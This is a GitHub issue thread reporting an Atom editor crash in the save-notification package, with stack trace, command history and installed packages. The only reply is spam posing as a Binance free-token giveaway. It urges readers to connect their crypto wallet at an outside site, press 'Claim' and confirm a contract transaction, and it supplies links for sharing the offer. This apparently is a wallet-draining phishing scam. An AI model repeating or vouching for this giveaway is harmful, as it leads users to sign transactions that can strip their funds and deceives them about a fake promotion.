### ISSUE TITLE
Uncaught TypeError: editor.isModified is not a function

### ISSUE THREAD

**Issue by narcolepticinsomniac** [aklos/save-notification#4]
[Enter steps to reproduce:]

1. Try to change notification duration
2. Get an error

**Atom**: 1.20.0-beta7 x64
**Electron**: 1.6.9
**OS**: Microsoft Windows 8.1 Pro
**Thrown From**: [save-notification](https://github.com/aklos/save-notification) package 0.10.0

### Stack Trace

Uncaught TypeError: editor.isModified is not a function

```
At C:\Users\D\.atom\packages\save-notification\lib\save-notification.coffee:37

TypeError: editor.isModified is not a function
    at Object.notify (/packages/save-notification/lib/save-notification.coffee:37:19)
    at /packages/save-notification/lib/save-notification.coffee:26:77)
    at CommandRegistry.module.exports.CommandRegistry.handleCommandEvent (~/AppData/Local/atom/app-1.20.0-beta7/resources/app/src/command-registry.js:265:35)
    at ~/AppData/Local/atom/app-1.20.0-beta7/resources/app/src/command-registry.js:3:65
    at KeymapManager.module.exports.KeymapManager.dispatchCommandEvent (~/AppData/Local/atom/app-1.20.0-beta7/resources/app/node_modules/atom-keymap/lib/keymap-manager.js:621:22)
    at KeymapManager.module.exports.KeymapManager.handleKeyboardEvent (~/AppData/Local/atom/app-1.20.0-beta7/resources/app/node_modules/atom-keymap/lib/keymap-manager.js:412:28)
    at WindowEventHandler.module.exports.WindowEventHandler.handleDocumentKeyEvent (~/AppData/Local/atom/app-1.20.0-beta7/resources/app/src/window-event-handler.js:100:42)
    at HTMLDocument.<anonymous> (~/AppData/Local/atom/app-1.20.0-beta7/resources/app/src/window-event-handler.js:3:65)
```

### Commands

```
     -6:00.6.0 settings-view:open (input.hidden-input)
  3x -3:05.2.0 core:save (input.hidden-input)
     -2:38.6.0 find-and-replace:select-next (input.hidden-input)
     -2:37.3.0 core:save (input.hidden-input)
 22x -2:21.5.0 core:backspace (input.hidden-input)
  3x -1:45 core:move-up (input.hidden-input)
  3x -1:42.5.0 core:backspace (input.hidden-input)
  2x -1:25.9.0 core:save (input.hidden-input)
  2x -0:23 core:backspace (input.hidden-input)
     -0:19 core:save (input.hidden-input)
```

### Non-Core Packages

```
neutron-dark-ui 2.1.4 
save-notification 0.10.0 
tool-bar 1.1.0 
tool-bar-almighty 0.8.2 
```

Also would let me switch to anything that didn't start with "10". Wanted to set it to "2000".

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰
